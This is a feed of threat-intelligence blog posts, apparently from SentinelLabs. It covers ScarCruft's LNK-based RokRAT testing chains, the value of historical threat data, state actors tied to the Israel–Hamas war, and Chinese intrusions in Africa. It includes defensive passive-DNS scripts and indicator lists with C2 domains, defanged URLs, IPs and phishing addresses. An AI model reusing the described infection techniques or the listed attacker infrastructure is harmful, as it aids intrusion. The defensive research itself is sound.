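Both of the tracking techniques just described, the parking-to-VPS-and-back rotation and the shared-hosting-IP pivot, are straightforward to automate over passive DNS resolution history. The script below is an added example written for this page, not SentinelLabs’ tooling. The hosting addresses are the two Cherry Servers IPs named above, but the parking address is an RFC 5737 documentation placeholder rather than a real Namecheap parking IP, the domain names are used only as labels, and every date in the sample records is invented for the demonstration.

```python
from collections import defaultdict
from datetime import date

# Constructed IP roles. The two hosting addresses are the Cherry Servers IPs named in the report;
# the parking address is an RFC 5737 documentation placeholder, not a real Namecheap parking IP.
HOSTING_IPS = {"84.32.131.87", "84.32.131.104"}
PARKING_IPS = {"198.51.100.10"}


def role(ip):
    if ip in HOSTING_IPS:
        return "hosting"
    if ip in PARKING_IPS:
        return "parking"
    return "unknown"


def short_lived_hosting(records, max_days=2):
    """records: (domain, ip, first_seen, last_seen) rows of resolution history.
    Returns {domain: [(ip, first_seen, last_seen), ...]} for every parking -> hosting -> parking
    sequence whose hosting window lasted at most max_days, i.e. the rotation described above."""
    by_domain = defaultdict(list)
    for domain, ip, first, last in records:
        by_domain[domain].append((first, last, ip))
    hits = {}
    for domain, rows in by_domain.items():
        rows.sort()   # chronological by first_seen
        for prev, cur, nxt in zip(rows, rows[1:], rows[2:]):
            window_days = (cur[1] - cur[0]).days + 1
            roles = (role(prev[2]), role(cur[2]), role(nxt[2]))
            if roles == ("parking", "hosting", "parking") and window_days <= max_days:
                hits.setdefault(domain, []).append((cur[2], cur[0], cur[1]))
    return hits


def hosting_pivots(records):
    """Group domains by shared hosting IP: the moderate-confidence pivot the report describes.
    A single shared VPS address is a lead, not an attribution."""
    shared = defaultdict(set)
    for domain, ip, _first, _last in records:
        if role(ip) == "hosting":
            shared[ip].add(domain)
    return {ip: sorted(domains) for ip, domains in shared.items()}


# Constructed resolution history: names are those mentioned in the report, all dates are invented.
SAMPLE_RECORDS = [
    ("offlinedocument.site", "198.51.100.10", date(2023, 11, 1), date(2023, 11, 14)),
    ("offlinedocument.site", "84.32.131.87", date(2023, 11, 15), date(2023, 11, 16)),
    ("offlinedocument.site", "198.51.100.10", date(2023, 11, 17), date(2023, 12, 31)),
    ("documentoffice.club", "198.51.100.10", date(2023, 10, 20), date(2023, 11, 9)),
    ("documentoffice.club", "84.32.131.104", date(2023, 11, 10), date(2023, 11, 11)),
    ("documentoffice.club", "198.51.100.10", date(2023, 11, 12), date(2023, 12, 31)),
    ("instantreceive.org", "84.32.131.87", date(2023, 11, 20), date(2023, 12, 5)),
]

if __name__ == "__main__":
    print(short_lived_hosting(SAMPLE_RECORDS))
    print(hosting_pivots(SAMPLE_RECORDS))
```

Fed with real passive DNS exports, `short_lived_hosting` surfaces the one- or two-day activation windows the report describes, and the returned dates bound the period in which phishing or delivery URLs on that domain would have been live.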

ScarCruft Cherry Servers overlap map

ScarCruft Testing Grounds

While investigating ScarCruft activities, we retrieved malware that we assess to be part of ScarCruft’s planning and testing processes. This includes a spectrum of shellcode variants delivering RokRAT, public tooling, and two oversized LNK files, named inteligence.lnk and news.lnk.

Although similar to those implemented by 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk and 8. 이도건 북한연구소 토론회.lnk discussed above, the infection chains executed by inteligence.lnk and news.lnk exhibit some differences. This has likely been done to evade detection based on the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

Infection chain: news.lnk

inteligence.lnk executes PowerShell code, which locates the executing LNK file based on its filename instead of its filesize. The code then extracts from the LNK file and displays a decoy PDF document (named inteligence.pdf), and downloads from a major Cloud file hosting provider a hex-encoded file named story.txt. The PowerShell code locates the content of the decoy document it extracts from the LNK file based on a byte pattern (50 4b 03 04) instead of a hardcoded file offset.

The PowerShell code then decodes the file, and executes the decoded file content in a thread. story.txt implements a benign shellcode that just opens notepad.exe, indicating that inteligence.lnk has been developed for testing purposes.

In contrast to 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk and 8. 이도건 북한연구소 토론회.lnk, inteligence.lnk does not execute a Windows Batch script or an external PowerShell script.

inteligence.lnk: Extraction and display of a decoy document
inteligence.lnk: Shellcode decoding and execution
inteligence.lnk: Shellcode

news.lnk downloads and executes PowerShell code delivered as a file named story3.txt. The implementation and functionality of the code are very similar to that executed by inteligence.lnk, with a major difference being that the shellcode it executes is not downloaded from a remote endpoint but is embedded in the LNK file itself.

In contrast to inteligence.lnk, the shellcode executed by news.lnk is weaponized and deploys the RokRAT backdoor. It is likely that news.lnk is the fully developed version of inteligence.lnk, intended for use in future ScarCruft campaigns. As of the time of writing, we have not observed news.lnk or its variants in the wild.

Both LNK files deploy the same decoy document – a public research report on the Kimsuky threat group by Genians, a South Korean cybersecurity company. The report is written in Korean and was released in late October 2023.

ScarCruft Decoy document

Given the report’s technical content, the LNK file names, and ScarCruft’s use of decoys relevant to the targeted individuals, we suspect ScarCruft has been planning phishing or social engineering campaigns on recent developments in the North Korean cyber threat landscape, targeting audiences consuming threat intelligence reports.

Conclusions

The findings outlined in this post highlight ScarCruft’s ongoing dedication to gathering strategic intelligence through targeted attacks. Our insight into ScarCruft’s malware testing activities reveals the adversary’s commitment to innovating its arsenal and expanding its target list, likely intending to target and/or masquerade as cybersecurity professionals or businesses.

We observed the group experimenting with new infection chains inspired by those they have used in the past. This involves modifying malicious code implementations and excluding certain files from the infection steps, likely as a strategy to evade detection based on filesystem artifacts and the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

We suspect that ScarCruft is pursuing non-public cyber threat intelligence and defense strategies. This could benefit not only ScarCruft specifically but also the other constituent groups within the North Korean threat landscape, aiding them in identifying threats to their operations and improving their operational playbooks.

A heightened awareness and better understanding of the adversary’s attack and infection methods among potential targets are crucial for effective defense. SentinelLabs remains actively engaged in tracking ScarCruft activities and supporting the organizations and individuals at risk of being targeted.

Indicators of Compromise

SHA-1 Hashes

Value Note
0ED884A3FC5C28CDB8562CD28993B30991681B0A intelligence.lnk
2F78ABC001534E28EB208A73245CE5389C40DDBE Malicious HWP document
39C97CA820F31E7903CCB190FEE02035FFDB37B9 Malicious Office document
4024A9B0C0F19A33A3C557C7E220B812EE6FDD17 8. 이도건 북한연구소 토론회.lnk
46C3F9DE79D85165E3749824804235ACA818BA09 9. 김태원 북한인권 전문가 토론회 토론문.hwp
483B84F973528B23E5C14BC95FBC7031A4B291F1 1. 전영선 북한 주민 정보접근권 강화방안.hwp
4C74E227190634A6125B2703B05CB16AD69AC051 2.이상용 반동사상문화배격법과 정보 유입 활동의 변화.pptx
577C3A0AC66FF71D9541D983E37530500CB9F2A5 Malicious Office document
7C4E37E0A733B5E8F0F723CCA2A9675901527DC4 Decoy document
88DB1E2EFBB888A97A530C8BEF8CA104CEAAB80C public.dat
8951F3EB2845C0060E2697B7F6B25ABE8ADE8737 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk
9DD8AA1D66CC4E765E63DC5121216D95E62A0E1C 10. 서유석 북한 주민들의 알권리 제고 방안.hwp
9E0C6A067AAB113E6A4B68299AB3B9D4C36FC330 news.lnk
9EAAAB9D4F65E3738BB31CDF71462E614FFBD2BA 6. 이종겸 북한인권 토론회 토론문.hwp
B23A3738B6174F62E4696080F2D8A5F258799CE5 조선 시장 물가 분석(회령).hwp
B91B318A9FBB153409A846BF173E9D1BD0CC4DBF 111223.bat
C4B58CA12F7B16B6D39CE4222A5A2E054CD77B4E 7. 박유성 북한주민 정보접근 강화방안.hwp
D457D6BDCFA6D31934FB1E277FA0DE7119E9C2A5 5. 여현철 북한주민 정보접근권 강화 방안.hwp
D9AC0CC6D7BDC24F52878D3D5AC07696940062D0 myprofile[.]zip
E46907CFAF96D2FDE8DA8A0281E4E16958A968ED Malicious Office document
E9DF1F28CFBC831B89A404816A0242EAD5BB142C Malicious HWP document
FBF4D8C7418B021305317A185B1B3534A2E25CC8 조선 시장 물가 분석(신의주).hwp

Domains

Value Note
app[.]documentoffice[.]club C2 domain (HWP and Office documents)
benefitinfo[.]live VPS overlap (moderate confidence)
benefitinfo[.]pro VPS overlap (moderate confidence)
benefiturl[.]pro VPS overlap (moderate confidence)
careagency[.]online VPS overlap (moderate confidence)
cra-receivenow[.]online VPS overlap (moderate confidence)
crareceive[.]site VPS overlap (moderate confidence)
depositurl[.]co VPS overlap (moderate confidence)
depositurl[.]lat VPS overlap (moderate confidence)
direct.traderfree[.]online VPS overlap (moderate confidence)
forex.traderfree[.]online VPS overlap (moderate confidence)
groceryrebate[.]online VPS overlap (moderate confidence)
groceryrebate[.]site VPS overlap (moderate confidence)
gstcreceive[.]online VPS overlap (moderate confidence)
instantreceive[.]org VPS overlap (moderate confidence)
nav[.]offlinedocument[.]site C2 domain (HWP documents)
receive[.]bio VPS overlap (moderate confidence)
receiveinstant[.]online VPS overlap (moderate confidence)
rentsubsidy[.]help VPS overlap (moderate confidence)
rentsubsidy[.]online VPS overlap (moderate confidence)
tinyurlinstant[.]co VPS overlap (moderate confidence)
urldepost[.]co VPS overlap (moderate confidence)
verifyca[.]online VPS overlap (moderate confidence)
visiononline[.]store VPS overlap (moderate confidence)

URLs

Value Note
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950 C2 URL (Office document)
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE C2 URL (Office document)
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6 C2 URL (Office document)
http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP C2 URL (HWP document)

IP Addresses

Value Note
84.32.129[.]32 Cherry Servers VPS
84.32.131[.]104 Cherry Servers VPS
84.32.131[.]30 Cherry Servers VPS
84.32.131[.]50 Cherry Servers VPS
84.32.131[.]59 Cherry Servers VPS
84.32.131[.]66 Cherry Servers VPS
84.32.131[.]87 Cherry Servers VPS

Email Addresses

Value Note
c039911[@]daum.net Phishing email address
kirnchi122[@]hanmail.net Phishing email address

Decoding the Past, Securing the Future | Enhancing Cyber Defense with Historical Threat Intelligence 

By: Tom Hegel
28 November 2023 at 14:28

Organizational defenders today face unprecedented pressure to keep up with a relentless stream of new attacks. No sooner is the latest campaign discovered, its indicators shared, and defenses bolstered, than we are on to the next one. The details of these attacks are added to our collective historical record, but most defenders rarely have the time or motivation to reconsider what further value they might offer.

However, mining historical data for insight into tomorrow’s attacks is, we would argue, an undervalued resource. From expanding our list of known indicators and developing better threat intelligence to improving our understanding of attribution and providing new discoveries, investigating historical data is an asset that cyber defenders can and should make more of.

In this post, we explore practical ways that revisiting past cyber incidents can empower defenders and help to anticipate future threats more effectively.

1. Exploring the Past to Expand Actionable Threat Intelligence

In September of 2023, SentinelLabs observed a new threat activity cluster by a previously unknown threat actor we dubbed Sandman. The threat actor deploys malware utilizing the LuaJIT platform, a development paradigm relatively rarely seen in the cyberespionage domain, but one with a historical association with suspected Western or Western-aligned advanced threat actors.

Early last year, SentinelLabs released a report on a new cyber threat actor we named ModifiedElephant. This research was the conclusion of an investigation into an unknown offensive threat actor responsible for targeted attacks on human rights activists, human rights defenders, academics, and lawyers across India with the objective of planting incriminating digital evidence. Our analysis identified that ModifiedElephant has been operating since at least 2012 and continued to operate as of the report.

Timeline sample of ModifiedElephant and SideWinder C2 Infrastructure

So why does this matter? Cyber paleontology allows us to take a small bit of knowledge of targeted intrusions, and expand it into hundreds of indicators of compromise, such as malware samples and unique infrastructure. In the case of ModifiedElephant, we tied the threat actor to hundreds of other intrusion attempts across the globe. This research found activity spread across nearly a decade, targeting individuals and organizations alike.

These greatly expanded IOCs allow us to improve the defenses of those who were originally targeted and of others who may be targeted in the future. Had we simply stopped researching the threat actor after the initial, smaller case of a handful of intrusions against individuals, our perception of this actor would have remained interesting but irrelevant to most. Revisiting a decade of activity instead allows us to understand and use actionable intelligence for direct network defense needs.
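As an added illustration of the expansion described in this section and of the "VPS overlap (moderate confidence)" labels in the ScarCruft indicator list above, here is an infrastructure pivot written for this page (not SentinelLabs tooling). It walks constructed passive-DNS-style records outward from a seed sample, lowers confidence each time a hop relies on co-hosting rather than an observed beacon, and refuses to cross hub IPs shared by many tenants; the records, hostnames and TEST-NET addresses are all made up for the example.

```python
import heapq
from collections import defaultdict

CONFIDENCE = {3: "high", 2: "moderate", 1: "low"}
HUB_THRESHOLD = 3   # an IP tied to more nodes than this is treated as shared hosting and never pivoted through

# Constructed relationship records for the example (not real telemetry): (node, relation, node).
# Node prefixes stand in for a sample hash, a domain or an IP; .example names and TEST-NET ranges are placeholders.
RECORDS = [
    ("sample:A", "beacons_to", "domain:c2-one.example"),
    ("domain:c2-one.example", "resolved_to", "ip:203.0.113.10"),
    ("domain:c2-two.example", "resolved_to", "ip:203.0.113.10"),   # co-hosted on a small VPS
    ("sample:B", "beacons_to", "domain:c2-two.example"),
    ("domain:c2-two.example", "resolved_to", "ip:203.0.113.11"),
    ("domain:lure.example", "resolved_to", "ip:203.0.113.11"),
    ("domain:c2-one.example", "resolved_to", "ip:198.51.100.5"),   # shared hosting hub with many tenants
    ("domain:tenant-1.example", "resolved_to", "ip:198.51.100.5"),
    ("domain:tenant-2.example", "resolved_to", "ip:198.51.100.5"),
    ("domain:tenant-3.example", "resolved_to", "ip:198.51.100.5"),
    ("domain:tenant-4.example", "resolved_to", "ip:198.51.100.5"),
]


def build_graph(records):
    """Undirected adjacency list; every record links both of its nodes."""
    adj = defaultdict(list)
    for left, rel, right in records:
        adj[left].append((right, rel))
        adj[right].append((left, rel))
    return adj


def is_ip(node):
    return node.startswith("ip:")


def pivot(records, seeds, max_hops=6):
    """Best-first expansion from seed indicators (Dijkstra with 0/1 costs on confidence).
    Confidence drops one level each time the walk leaves an IP for another domain, because that
    hop rests only on co-hosting evidence; hub IPs are never crossed, so unrelated tenants stay out."""
    adj = build_graph(records)
    hubs = {n for n in adj if is_ip(n) and len(adj[n]) > HUB_THRESHOLD}
    best = {}
    heap = [(-3, 0, seed, (seed,)) for seed in seeds]
    heapq.heapify(heap)
    while heap:
        neg_level, hops, node, path = heapq.heappop(heap)
        level = -neg_level
        if node in best and best[node]["level"] >= level:
            continue                                   # already reached with at least this confidence
        best[node] = {"level": level, "confidence": CONFIDENCE[level], "path": list(path)}
        if hops >= max_hops:
            continue
        for nxt, _rel in adj[node]:
            if nxt in hubs:
                continue
            next_level = level - 1 if is_ip(node) and not is_ip(nxt) else level
            if next_level >= 1:
                heapq.heappush(heap, (-next_level, hops + 1, nxt, path + (nxt,)))
    return best


def report(best):
    """Human-readable listing, highest confidence first, with the pivot path that justifies each entry."""
    rows = sorted(best.items(), key=lambda kv: (-kv[1]["level"], kv[0]))
    return "\n".join(f"{info['confidence']:8} {node:28} via {' -> '.join(info['path'])}" for node, info in rows)


if __name__ == "__main__":
    print(report(pivot(RECORDS, ["sample:A"])))
```

The path stored with each result is the part worth keeping: an indicator reached only through a co-hosting hop deserves the "moderate" label the table above uses, and a reviewer should be able to see exactly which shared IP that judgement rests on. Raising `HUB_THRESHOLD` pulls in more co-tenants at the cost of false positives from bulk hosting.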

2. Developing Better Strategic Threat Intelligence

Pushing past directly actionable intelligence such as malware samples, IOCs, and threat detection rules, we can also gain new strategic intelligence on threat actors. Specifically, our perspective of known threat actors can alter greatly when we review past intrusions.

For example, in September we reported and presented at LABScon the topic of China’s soft power agenda throughout Africa. In this research, we shared how Chinese attributed APTs, such as “Backdoor Diplomacy”, have been linked to a previously-reported set of intrusions across South Africa, Kenya, Senegal, and Ethiopia in the past few years.

Revisiting previously reported infrastructure associated with the threat actor opened our eyes to a wider set of targets in these countries, including targets we had not observed before, such as financial organizations. Today, we can use this expanded understanding of the threat actor to apply strategic intelligence for financial organizations and for the countries newly observed to be of interest to the attacker.

Applying a similar approach to other high-interest threat actors, and questioning our past assessments and intelligence about them, would be valuable for expanding defense capabilities and context today.

3. Enhancing Our Understanding of Attribution

An additional value which can come from a fresh review of historical threat activity concerns attribution – the process of identifying the true attacker behind an activity.

Past intrusions can become clearer once we understand who the attacking entity actually was, or which threat actor cluster some previously unknown activity now falls under. For example, in August we identified malware with a long history of use by a variety of suspected Chinese clusters, along with infrastructure targeting Southeast Asia’s gambling sector, both related to previous activities attributed to BRONZE STARLIGHT, a Chinese threat actor whose main goal appears to be espionage rather than financial gain.

In addition, we recently reported on the Appin hack-for-hire business in India and how unconfirmed and mysterious activity from years back can finally be attributed to them. This includes Operation Hangover, the well-known industrial espionage case, and the targeting of human rights activists with custom Mac malware.

C2 / Delivery Server bluecreams[.]com and Linked Malware

Knowing that these sets of activity tie back to a central organization allows renewed understanding and interest in the hack-for-hire threat actor industry. Additionally, and perhaps more importantly, this provides victims with an opportunity to hold attackers responsible for their actions, if desired.

4. Newer Techniques Offer Fresh Insights From Old Data

Using today’s technology to expand past context and knowledge of attackers is also increasingly valuable to modern defenders. The technology sector evolves at a blistering pace, and new research tools often arrive to provide new capabilities.

Although much recent focus has been on adopting and adapting LLMs and generative AI for various infosec tasks, we can also see examples of existing technologies that continue to develop and push the boundaries of what is possible.

One of the best examples of this is YARA, today’s go-to tool for writing malware description rules used to hunt for various types of files, such as malware or other files of high interest. YARA continues to be developed in ways that can yield new discoveries from old datasets. New rule writing methods, combined with major malware repositories such as Stairwell and VirusTotal, can lead to the discovery of leaked attacker files, changes within targeted malware families, and uploads of never-before-seen malware from past attacks.

Combining new discoveries with other tools for tracking infrastructure, like SilentPush, it is possible to make similar high interest discoveries centered around old attacker infrastructure.

Conclusion

As we move forward, it’s important not to lose sight of the past. As many of our research examples highlighted above show, retrospective analyses can wring new actionable intelligence from the raw data of past breaches and help to preempt future attacks.

We encourage other analysts to join us in connecting the dots between what was known, what was overlooked, and what can be learned, taking advantage of the insights that new technologies and methods afford us. Historical data isn’t just an academic record of what went before, but a resource we must mine to craft a more resilient and responsive cybersecurity posture.

Elephant Hunting | Inside an Indian Hack-For-Hire Group

By: Tom Hegel
16 November 2023 at 16:19

Editor’s Note:

SentinelOne has temporarily removed the article “Elephant Hunting | Inside an Indian Hack-For-Hire Group” on Dec 22, 2023 in light of a pending court order and is doing so out of an abundance of caution. SentinelOne stands by its findings and was transparent about the evidence it gathered to support its findings. Those findings were based on many hours of research and verified sources and we are closely following the pending legal action. All rights reserved

The Israel-Hamas War | Cyber Domain State-Sponsored Activity of Interest

By: Tom Hegel
24 October 2023 at 12:54

By Tom Hegel and Aleksandar Milenkoski 

Since the start of the Israel-Hamas war, the cyber domain has played a critical role in the conflict, albeit in ways the world may not have expected. Immediately following the attacks from Hamas on October 7th, social media became a hotbed of disinformation, inaccurate self-described OSINT investigators, and public confusion. Unfortunately, leading social media platforms continue to fail at stopping the spread of disinformation regarding this war. We will continue to see it abused as a go-to method to sway public perception of events with no signs of it ending soon.

However, outside of social media information abuse and opportunistic hacktivism, we must not forget the likelihood of targeted attacks originating from specific, state-sponsored threat actors. Understanding and closely monitoring all aspects of the quickly evolving conflict within the digital domain is critical, as such targeted attacks will translate into real-world consequences. While we continue to collaborate privately with partners, we also seek to bolster the wider industry’s knowledge about where to place our efforts.

This is an updated compendium of actors for cybersecurity researchers, analysts, and network defenders to watch closely. These actors have potential for significant involvement as the war continues, including APTs across Hamas, Hezbollah, and Iran-based clusters of activity. While state-sponsored APTs should remain a strong focus, we must also carefully monitor the increasingly common use of hacktivist personas used to cloak state-sponsored operations.

In this post, we share recommended and publicly accessible information in an effort to streamline the community’s understanding of the relevant actors across historical reports. In addition, we share our perspective on overlaps in public actor naming. Please note that each source of public reporting may perform attribution and actor clustering from its own perspective. Nonetheless, these sources should serve as starting points for readers looking to catch up on relevant open-source intelligence for their own defense posturing and analysis needs.

Hamas-Aligned Clusters

Arid Viper

Aliases:

  • APT-C-23
  • Grey Karkadann
  • Desert Falcon
  • Mantis

Description:

Arid Viper is a threat group conducting cyber espionage and information theft operations since at least 2017, predominantly against targets in the Middle East. Based primarily on the geopolitical context of its activities, Arid Viper is suspected to operate on behalf of Hamas, though further conclusive information is needed to solidify this assessment. For example, the Israel Defense Forces (IDF) have reported on a campaign targeting soldiers stationed near the Gaza border, which is suspected to be orchestrated by Hamas. This campaign has been separately attributed with medium confidence to Arid Viper based on victimology and similarities with previous activities attributed to this actor, such as overlaps in initial infection techniques.

Targeting individuals is a common practice of Arid Viper. This includes pre-selected Palestinian and Israeli high-profile targets as well as broader groups, typically from critical sectors such as defense and government organizations, law enforcement, and political parties or movements. Common initial infection vectors include social engineering and phishing attacks using themed lure documents. The latter often involves establishing rapport with targets over social media, such as Facebook and Instagram, with catfishing being a frequently used technique.

Arid Viper uses a variety of malware as part of its operations, including stagers, backdoors, and mobile spyware applications for the iOS and Android platforms. Arid Viper’s malware is actively maintained and upgraded to meet the group’s operational requirements. This threat actor has consistently demonstrated innovation by adopting new malware development practices across a range of programming and scripting languages, such as Delphi, Go, Python, and C++.

Gaza Cybergang

Aliases:

  • Molerats
  • TA402
  • Gaza Hackers Team
  • Moonlight
  • Extreme Jackal
  • Aluminum Saratoga
  • JEA/Jerusalem Electronic Army (Low to Medium Confidence)

Description:

Gaza Cybergang is a threat actor that has been active since at least 2012. The group primarily targets entities throughout the Middle East, including Israel and Palestine, and has less frequently been observed targeting the EU and US. Targeted entities include government, defense, energy, financial, media, technology, telecommunication, and civil society organizations. Our current assessment of Gaza Cybergang indicates medium to high confidence in a Hamas affiliation.

The group has historically used a variety of custom and publicly available tools in their attacks, showing a notable preference for spear phishing as a method of initial access. They have been known to use malicious documents and email attachments to deliver malware and link lures, and they often deploy implants to maintain persistence on compromised systems. Tools include Molerat Loader, XtremeRAT, SharpStage, DropBook, Spark, Pierogi, PoisonIvy, and many others observed uniquely over the years.

The overall objectives of Gaza Cybergang appear to be primarily intelligence collection and espionage. They seek to gather intelligence, monitor political developments in the region, and support their cause through cyber activities. The group has been active for many years, and their persistence and adaptability in the face of evolving tensions make it a notable actor in the cyber threat landscape moving forward.

Hezbollah-Aligned Clusters

Plaid Rain

Aliases:

  • Aqua Dev 1
  • Polonium

Description:

Plaid Rain is a threat actor first documented in 2022 with a primary focus on targeting entities in Israel across a broad range of verticals, including defense, government, manufacturing, and financial organizations. Plaid Rain is considered to be based in Lebanon, however, its activities indicate potential coordination with Iran-nexus actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS). Some indicators supporting this assessment include observed overlaps in targeting and TTPs. The potential collaboration between MOIS and Plaid Rain positions this threat group in the nexus of actors that serve as proxies, providing plausible deniability to the government of Iran, such as Cobalt Sapling.

For initial infection, Plaid Rain is suspected to rely primarily on vulnerability exploitation, downstream compromises, and stolen credentials. The group’s arsenal consists of a wide range of well-maintained custom tooling, exemplified by the Creepy malware toolset. Plaid Rain’s malware supports a broad range of complementary functionalities that follow the latest trends in the malware landscape. For example, the CreepyDrive malware uses cloud services for command and control, likely in an attempt to evade detection by making malicious traffic look legitimate.

Lebanese Cedar

Aliases:

  • Volatile Cedar
  • DeftTorero

Description:

Lebanese Cedar is a lesser-reported APT with a history of successful intrusions across Lebanon, Israel, Palestine, Egypt, the United States, the United Kingdom, and more. The group was first observed in 2015 and has since received limited security industry attention. Similar to Plaid Rain, we associate Lebanese Cedar with the Lebanese Shiite militant group Hezbollah, as well as with potential coordination with Iran-nexus actors affiliated with the Ministry of Intelligence and Security (MOIS).

The most commonly observed initial access method has been the compromise of victim web servers via n-day vulnerabilities for the deployment of webshells, including ASPXSpy, devilzshell, and Caterpillar. Subsequent use of Meterpreter and the group’s custom Explosive RAT has been associated with maintaining access through the theft of legitimate network credentials, ultimately in pursuit of espionage objectives.

Relevant Iranian Clusters

Iran hosts a diverse array of state-sponsored threat actors whose activities extend well beyond the Israel-Hamas war. These threat actors vary in size, capability, and motivation, and they have been responsible for a wide spectrum of cyber operations. While some have clear affiliations with the Iranian government, many Iranian hacktivist personas claim to operate independently. It is crucial to acknowledge that emerging hacktivist collectives may serve as a means to obscure state sponsorship, influence public opinion, and conceal attribution of offensive actions.

We strongly recommend that media outlets and industry colleagues exercise caution when publicly disseminating content produced by hacktivist collectives. The propagation of their claims, viewpoints, and actions serves an overarching mission, and amplifying these activities contributes to their success.

Nonetheless, the diversity and adaptability of Iranian cyber threat actors make them a significant and multifaceted component of the global threat landscape moving forward. As we monitor the evolving situation in the Middle East, it is imperative to focus on Iran as a potential origin of both direct cyber offensive actions and proxy operations supported by Iran-linked groups like Hamas and Hezbollah.

ShroudedSnooper

Aliases:

  • Storm-0861
  • Scarred Manticore

Description:

ShroudedSnooper has been part of multiple recent intrusions across the Middle East, including in Israel within the past two months, and elsewhere since at least 2020. The most recent observations and activity we can confirm center around intrusions in the telecommunication and government sectors. The group is attributed to Iran’s Ministry of Intelligence and Security (MOIS).

Our current understanding of the group is that it operates for intelligence collection and to provide initial access to other MOIS entities. Initial access for ShroudedSnooper has been, and potentially continues to be, accomplished through the compromise of publicly accessible web servers via n-day vulnerabilities. As observed in the recent Israeli telecom intrusions, the group has then made use of backdoors mimicking enterprise security software.

Cobalt Sapling

Aliases:

  • Moses Staff
  • Abraham’s Ax
  • Marigold Sandstorm

Description:

‘Moses Staff’ and ‘Abraham’s Ax’ are hacktivist personas known for their anti-Israel rhetoric, disruptive and data exfiltration attacks, and penchant for leaking stolen data online along with propaganda content in the form of videos or imagery. Moses Staff and Abraham’s Ax are potentially distinct groups. Since the emergence of Moses Staff in 2021 and of Abraham’s Ax in 2022 proclaiming allegiance to Hezbollah, the groups have continued to separately maintain their online presence. However, they share iconography, content editing, and infrastructure management practices. This, and the alignment of their activities with the geopolitical interests of Iran, suggests that the two groups are likely part of a single cluster (also referred to as Cobalt Sapling) and serve as proxy groups providing plausible deniability to Iran.

Moses Staff has traditionally focused its efforts on business and government organizations primarily within Israel. In contrast, Abraham’s Ax has asserted responsibility for attacks on entities located outside of Israel but with geopolitical relevance to the country. For example, the alleged intrusions into Saudi Arabian government entities by Abraham’s Ax may have been an attempt to counter the normalization of relations between Israel and Saudi Arabia previously conditioned by resolving the Israeli-Palestinian issue.

Although the threat intelligence research community has identified custom offensive tooling observed in Moses Staff attacks, such as StrifeWater, PyDCrypt and DCSrv, we do not exclude the possibility of Moses Staff and Abraham’s Ax sharing tooling and operational practices making accurate clustering challenging at this time. Operations attributed to Moses Staff have involved RATs and ransomware with no indications of financial motivations, but rather disruption, destruction, and concealment of cyber espionage activities.

APPENDIX: Recommended Public Reporting

Arid Viper

Gaza Cybergang

Plaid Rain

Lebanese Cedar

ShroudedSnooper

Cobalt Sapling

Cyber Soft Power | China’s Continental Takeover

By: Tom Hegel
21 September 2023 at 17:00

Executive Summary

  • SentinelLabs observes sustained tasking towards strategic intrusions by Chinese threat actors in Africa, designed to extend influence throughout the continent.
  • New attacks include those against telecommunication, finance and government, attributed to the BackdoorDiplomacy APT and the threat group orchestrating Operation Tainted Love.
  • China’s engagement in soft power diplomacy has a lengthy history, yet the use of strategic cyber intrusions highlights recent objectives and potential lasting impact in Africa.
  • To better manage the challenge of tracking state-aligned cyber activities in less monitored areas like Africa and Latin America, we are announcing the formation of the ‘Undermonitored Regions Working Group’. Launched today at LABScon, this effort calls upon established security researchers to join analytic capabilities, combine telemetry, resources, and local expertise, and promote a unified approach to analyzing cyber operations used to support soft power agendas in Africa and Latin America.

Introduction

In the evolving cyber threat landscape, it is important to constantly challenge our biases. There are large pockets of important threat activity occurring in regions around the world that are less commonly addressed in Western threat research. While much attention has rightfully been drawn to Chinese threat actors targeting the West, the broader set of global activity supporting and promoting similar interests remains opaque. At a time of pervasive foreign activities aimed at cornering natural resources and co-opting the governance of less represented countries, we have to ask: what is happening across the vast African continent?

As we contemplate where China might stand in the global arena in the next 5 to 10 years, it’s evident that there exists a considerable gap in the realm of cyber threat intelligence with regards to Africa as a whole, and more specifically how it ties into the long term agenda of the People’s Republic of China (PRC). Africa, with its highly complex and dynamic environment, poses a unique challenge for accurately characterizing its cyber threat landscape.

In the threat intelligence industry, we have a habit of overlooking regions where our immediate financial interests don’t appear to be at stake. Yet, it is precisely in places like Africa and Latin America that we witness these threat actors subtly shifting the balance of negotiations and playing pivotal roles in larger geopolitical strategies. There’s an urgent need to acknowledge the importance of these frequently overlooked regions in the global threat landscape and take radical steps to close the gap in our situational awareness. These regions are shaping up to be the battlegrounds of the future.

Our focus is on incentivizing strategic intelligence on the state of cyber operations targeting Africa. We recognize that these operations need to be placed in the greater context of multidimensional campaigns that include more traditional forms of espionage, market maneuvers, and influence. This is vital to understanding the PRC’s geostrategic ambitions and technological investments, and fundamental to forging a forward-thinking and holistic defense approach. We highlight key examples, including the targeting by Chinese state-sponsored APTs such as the group behind Operation Tainted Love and BackdoorDiplomacy, and how they blend into the PRC’s soft power agenda across Africa.

Background on Soft Power Engagement

While cyber capabilities are important, they are just one of the more recent tools used in implementing broad national soft power strategies. Spanning several decades, China’s involvement in the continent has adapted to embrace economic, political, and cultural dimensions that represent both comprehensive and strategic opportunities. The establishment of Confucius Institutes and expanding media investments have been a tool in crafting narratives that underline the positive aspects of its engagement in Africa.

China has made significant strategic investments in Africa that are widely characterized as ‘debt-trap diplomacy’. The term refers to a scenario in which a creditor country extends excessive credit to a debtor country with the presumed intention of extracting economic or political concessions when the debtor country cannot meet its repayment terms.

Specifically in Africa, China has financed large critical infrastructure projects in many African countries. Countries pursuing economic and infrastructure development have found China a willing and eager investor over the last decade. Future adverse effects are easily brushed aside by the immediate perceived benefits of these investments.

